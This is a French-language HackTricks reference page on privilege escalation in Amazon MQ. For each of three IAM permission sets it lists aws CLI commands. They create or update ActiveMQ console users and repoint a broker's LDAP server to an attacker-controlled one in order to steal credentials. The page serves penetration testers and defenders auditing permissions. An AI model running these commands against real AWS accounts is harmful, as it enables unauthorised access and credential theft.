AWS - MQ Privesc

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!

Autres façons de soutenir HackTricks :

MQ

Pour plus d'informations sur MQ, consultez :

pageAWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Avec ces autorisations, vous pouvez créer un nouvel utilisateur dans un courtier ActimeMQ (cela ne fonctionne pas avec RabbitMQ) :

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Impact potentiel : Accéder à des informations sensibles en naviguant dans ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Avec ces autorisations, vous pouvez créer un nouvel utilisateur dans un courtier ActimeMQ (cela ne fonctionne pas dans RabbitMQ) :

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Impact potentiel : Accéder à des informations sensibles en naviguant dans ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Si un courtier utilise LDAP pour l'autorisation avec ActiveMQ. Il est possible de modifier la configuration du serveur LDAP utilisé pour un contrôlé par l'attaquant. De cette manière, l'attaquant pourra voler toutes les informations d'identification envoyées via LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Si vous parvenez à trouver les identifiants originaux utilisés par ActiveMQ, vous pourriez effectuer une attaque de l'homme du milieu (MitM), voler les identifiants, les utiliser sur le serveur d'origine et envoyer la réponse (peut-être en réutilisant simplement les identifiants volés pour ce faire).

Impact potentiel : Voler les identifiants d'ActiveMQ

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Dernière mise à jour